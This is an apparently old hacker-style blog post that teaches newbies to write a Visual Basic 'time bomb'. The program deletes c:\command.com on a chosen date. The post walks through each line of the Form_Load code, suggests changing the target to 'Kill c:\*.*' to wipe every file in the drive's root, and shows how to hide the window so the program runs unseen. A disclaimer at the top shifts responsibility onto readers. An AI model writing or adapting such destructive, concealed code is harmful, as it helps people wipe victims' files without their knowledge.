Note:

Guys and all the beauties visiting my Blog plz take a note that I cannot be held responsible for any misuse or mishandling of any tricks or virus codes.
You can use them if and only if you are confident enough and able to take responsibility for any outcome.
5:26 AM

Simple Visual Basic Time Bomb

Posted by JAsh

This is for the those newbies that says that maknig viruses is very difficult. In the small article i'll show u how to make a vb time bomb.

Time Bomb ?

Time bomb means the virus that launch its attack when the spacified time had reached.

So Now How ?

Do as directed :>
1. Start vb with a STANDAREDEXE.
2. Open upthe code window the window where the code should be written.
3. Put the following in the Form_Load subroutine

--Code Begin--

Private Sub Form_Load()
Dim dod As Date
dod = " 01/1/2006"
If dod = Date Then
Kill "c:\command.com"
End If
End Sub

--Code End--

Whats this Shit does?

Now i'll tell u how it works and what does it do:
1.In first line u'll see "Private Sub Form_Load()" this a subroutine or u may say a function for jus understanding that is executed when the program u created is launched.So it means that our code will be executed whe program runs.
2.in 2nd line it declare a variable "dod" as a datatype Date.
3.in 3rd line it assign a destruction date to that variable.u may change it with wat u like in the format of month/dat/year.
4.in 4th line it compare the dod variable to Date which return the current date of the Pc.
5.and then when the dod is equal to Date the the code after the is executed that is ..

Kill "c:\command.com"

this will delete the command.com file in c: drive

If u r really evil?

u can change the " Kill "c:\command.com" to "Kill c:\*.* "

Now to hide the program(i-e) physicaly not seen but actually it is working in background.type the following in the top of the code:

Form1.Visible = False

0 comments:

Post a Comment